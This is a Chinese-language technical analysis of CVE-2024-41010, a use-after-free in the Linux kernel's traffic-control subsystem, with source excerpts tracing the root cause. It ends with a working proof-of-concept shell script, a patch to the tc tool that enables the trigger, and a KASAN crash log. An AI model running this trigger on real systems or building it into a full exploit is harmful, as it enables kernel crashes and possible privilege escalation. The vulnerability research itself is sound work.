Introduction

Linux Traffic Control (net/sched) 是一個能控制網路流量的 subsystem,其提供使用者多種不同的 scheduler (qdisc) 來做流量控管,像是 ingress 以及 clsact。「bpf: Fix too early release of tcx_entry」(CVE-2024-41010) 這個 commit 所修補的,即是一個出現在 net/sched subsystem、因為過早釋放 tcx_entry object 而導致的 UAF 漏洞。

Commit log 已經有詳細的文字說明,因此接下來主要從程式碼的角度來分析該漏洞。讀者可以參考下方提供的 ingress/clsact qdisc 結構 overview,來了解 private data 與 tcx_entry object 之間的關係。

image-20240724130453866

image-20240724130442427

Root Cause

1. Initialize Ingress Qdisc

當新增一個 ingress qdisc 時,分別會建立 bpf_mprog_entry object [1] 與 tcf_block object [2],此外也會初始化 mini queue pointer,使其指向 tcx_entry object 的成員 miniq [3]。如果 bpf_mprog_entry object 是新建立的話,也會將其 bind 到 net_device object 上 (dev->tcx_ingress) [4]。

static int ingress_init(struct Qdisc *sch, struct nlattr *opt,
            struct netlink_ext_ack *extack)
{
    struct ingress_sched_data *q = qdisc_priv(sch);
    struct net_device *dev = qdisc_dev(sch);
    struct bpf_mprog_entry *entry;
    
    // [...]
    entry = tcx_entry_fetch_or_create(dev, true, &created); // [1]
    tcx_miniq_set_active(entry, true);
    
    mini_qdisc_pair_init(&q->miniqp, sch, &tcx_entry(entry)->miniq); // [3]
    tcx_entry_update(dev, entry, true); // [4]
    
    err = tcf_block_get_ext(&q->block, sch, &q->block_info, extack); // [2]
    // [...]
}

如果在建立 block 時給定一個不為 0 的 index [5],這個 block 就會被視為 shared block,並且另外由 network object tcf_net 底下的 idr table 記錄一份 [6]。

int tcf_block_get_ext(struct tcf_block **p_block, struct Qdisc *q,
              struct tcf_block_ext_info *ei,
              struct netlink_ext_ack *extack)
{
    struct net *net = qdisc_net(q);
    struct tcf_block *block = NULL;
    int err;

    if (ei->block_index) // [5]
        block = tcf_block_refcnt_get(net, ei->block_index);

    if (!block) {
        block = tcf_block_create(net, q, ei->block_index, extack);
        // [...]
        if (tcf_block_shared(block)) {
            err = tcf_block_insert(block, net, extack); // [6]
        }
    }
    // [...]
}

2. Attach Chain0 to Block1

tc_ctl_chain() 會為指定 index 的 block 新增 chain,並且當 chain index 為 0 時 [1],這個 chain 會被視為是 block 的 chain head,也就是 chain0 [2]。

static struct tcf_chain *tcf_chain_create(struct tcf_block *block,
                      u32 chain_index)
{
    struct tcf_chain *chain;
    chain = kzalloc(sizeof(*chain), GFP_KERNEL);
    // [...]
    chain->refcnt = 1;
    if (!chain->index) // [1]
        block->chain0.chain = chain; // [2]
    return chain;
}

3. Graft Clsact Qdisc to Old One

tc_modify_qdisc() 在滿足某些條件時,允許用不同類型的 qdisc 來 replace 既有的 qdisc;而如果請求的 class id 為 TC_H_INGRESS,就會先建立一個新的 qdisc object [1],並在最後 graft (replace) 掉舊的 [2]。

static int tc_modify_qdisc(struct sk_buff *skb, struct nlmsghdr *n,
               struct netlink_ext_ack *extack)
{
    // [...]
    if (clid == TC_H_INGRESS) {
        if (dev_ingress_queue(dev)) {
            q = qdisc_create(dev, dev_ingress_queue(dev), // [1]
                     tcm->tcm_parent, tcm->tcm_parent,
                     tca, &err, extack);
        }
        // [...]
    }
    err = qdisc_graft(dev, p, skb, n, clid, q, NULL, extack); // [2]
    // [...]
}

初始化 clsact qdisc 的流程大致上與 ingress 相同,但是因為在步驟 “1. Initialize Ingress Qdisc” 已經建好相關的 object,因此這邊會拿到與 ingress 相同的 tcx_entry object [3] 以及 shared tcf_block object [4]。

static int clsact_init(struct Qdisc *sch, struct nlattr *opt,
               struct netlink_ext_ack *extack)
{
    entry = tcx_entry_fetch_or_create(dev, true, &created); // [3]
    // [...]
    mini_qdisc_pair_init(&q->miniqp_ingress, sch, &tcx_entry(entry)->miniq);
    // [...]
    err = tcf_block_get_ext(&q->ingress_block, sch, &q->ingress_block_info, // [4]
                extack);
    // [...]
}

後續在 qdisc_graft() 處理 graft 時,會呼叫 qdisc_destroy() 把舊的 ingress qdisc 刪掉,接著走到 ingress_destroy()。然而該 function 卻直接把 bpf_mprog_entry object 設成 inactive [5] 並且釋放掉 [6],但實際上新的 clsact qdisc 仍可以透過 miniqp_ingress reference 到已被釋放的 tcx_entry object (其成員 miniq),因此造成 UAF。

static void ingress_destroy(struct Qdisc *sch)
{
    // [...]
    struct bpf_mprog_entry *entry = rtnl_dereference(dev->tcx_ingress);
    // [...]
    if (entry) {
        tcx_miniq_set_active(entry, false); // [5]
        if (!tcx_entry_is_active(entry)) {
            tcx_entry_update(dev, NULL, true);
            tcx_entry_free(entry); // [6]
        }
    }
    // [...]
}

POC

#!/bin/sh

unshare -n sh -c """
./network-tools/ip link set lo up
./network-tools/tc qdisc add dev lo ingress_block 1 handle ffff: ingress
./network-tools/tc chain add block 1
./tc qdisc replace dev lo ingress_block 1 handle 1234: clsact
sleep 1 # wait RCU
"""

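./network-tools/tc 為正常的 tc tool,而 ./tc 則是 patch 過的 tc tool,不然沒有辦法任意控制 clsact 的 handle value。注意下方 diff 的方向是由 patch 後的版本 (tc/tc_qdisc.c) 對照原始版本 (tc/tc_qdisc_orig.c),也就是說實際的修改是把 `req.t.tcm_handle = TC_H_MAKE(TC_H_CLSACT, 0);` 這一行註解掉: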

--- tc/tc_qdisc.c    2024-07-24 11:36:42.702698210 +0800
+++ tc/tc_qdisc_orig.c       2024-07-24 11:36:38.414843027 +0800
@@ -92,7 +92,7 @@
                        req.t.tcm_parent = TC_H_CLSACT;
                        strncpy(k, "clsact", sizeof(k) - 1);
                        q = get_qdisc_kind(k);
-                       // req.t.tcm_handle = TC_H_MAKE(TC_H_CLSACT, 0);
+                       req.t.tcm_handle = TC_H_MAKE(TC_H_CLSACT, 0);
                        NEXT_ARG_FWD();
                        break;
                } else if (strcmp(*argv, "ingress") == 0) {

下方為觸發漏洞時的 KASAN 錯誤資訊:

[   44.560441] BUG: KASAN: slab-use-after-free in mini_qdisc_pair_swap+0x26/0xb0
[   44.561275] Read of size 8 at addr ffff888003fd8000 by task kworker/u2:1/28
[   44.561660]
[   44.561930] CPU: 0 PID: 28 Comm: kworker/u2:1 Not tainted 6.7.0-rc3 #13
[   44.562174] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-5 04/01/2014
[   44.562546] Workqueue: netns cleanup_net
[   44.563162] Call Trace:
[   44.563336]  <TASK>
[   44.563498]  dump_stack_lvl+0x32/0x40
[   44.563683]  print_report+0xcf/0x660
[   44.563828]  ? __virt_addr_valid+0xd0/0x150
[   44.563984]  ? mini_qdisc_pair_swap+0x26/0xb0
[   44.564130]  kasan_report+0xbe/0xf0
[   44.564275]  ? mini_qdisc_pair_swap+0x26/0xb0
[   44.564413]  mini_qdisc_pair_swap+0x26/0xb0
[   44.564552]  ? clsact_egress_block_get+0x20/0x20
[   44.564693]  tcf_chain0_head_change_cb_del+0xc7/0x180
[   44.564869]  tcf_block_put_ext+0x1a/0x50
[   44.565020]  clsact_destroy+0x96/0x3c0
[   44.565156]  ? qdisc_reset+0x1ab/0x1c0
[   44.565300]  __qdisc_destroy+0x54/0xc0
[   44.565430]  dev_shutdown+0x100/0x170
[   44.565568]  unregister_netdevice_many_notify+0x2e0/0xb00
[   44.565764]  ? netdev_freemem+0x30/0x30
[   44.565899]  ? unregister_netdevice_queue+0xb7/0x150
[   44.566057]  ? unregister_netdevice_many+0x10/0x10
[   44.566210]  ? mutex_is_locked+0x16/0x30
[   44.566345]  default_device_exit_batch+0x28b/0x310
[   44.566495]  ? unregister_netdev+0x20/0x20
[   44.566643]  ? cfg80211_switch_netns+0x2c0/0x2c0
[   44.566814]  cleanup_net+0x2c2/0x4b0
[   44.566955]  ? peernet2id+0x40/0x40
[   44.567077]  ? read_word_at_a_time+0xe/0x20
[   44.567212]  ? kick_pool+0x32/0x170
[   44.567329]  process_one_work+0x2b6/0x490
[   44.567479]  worker_thread+0x544/0x7d0
[   44.567621]  ? process_one_work+0x490/0x490
[   44.567762]  kthread+0x16d/0x1b0
[   44.567887]  ? kthread_complete_and_exit+0x20/0x20
[   44.568030]  ret_from_fork+0x28/0x50
[   44.568149]  ? kthread_complete_and_exit+0x20/0x20
[   44.568265]  ret_from_fork_asm+0x11/0x20
[   44.568424]  </TASK>
[   44.568562]
[   44.568634] Allocated by task 52:
[   44.569640]
[   44.569702] Freed by task 8:
[   44.570345]
[   44.570419] Last potentially related work creation:
[   44.571289]
[   44.571364] The buggy address belongs to the object at ffff888003fd8000
[   44.571364]  which belongs to the cache kmalloc-2k of size 2048
[   44.571655] The buggy address is located 0 bytes inside of
[   44.571655]  freed 2048-byte region [ffff888003fd8000, ffff888003fd8800)
[   44.571884]
[   44.572004] The buggy address belongs to the physical page:
[   44.573148]
[   44.573211] Memory state around the buggy address:
[   44.573455]  ffff888003fd7f00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[   44.573628]  ffff888003fd7f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[   44.573883] >ffff888003fd8000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   44.574048]                    ^
[   44.574185]  ffff888003fd8080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   44.574354]  ffff888003fd8100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   44.574513] ==================================================================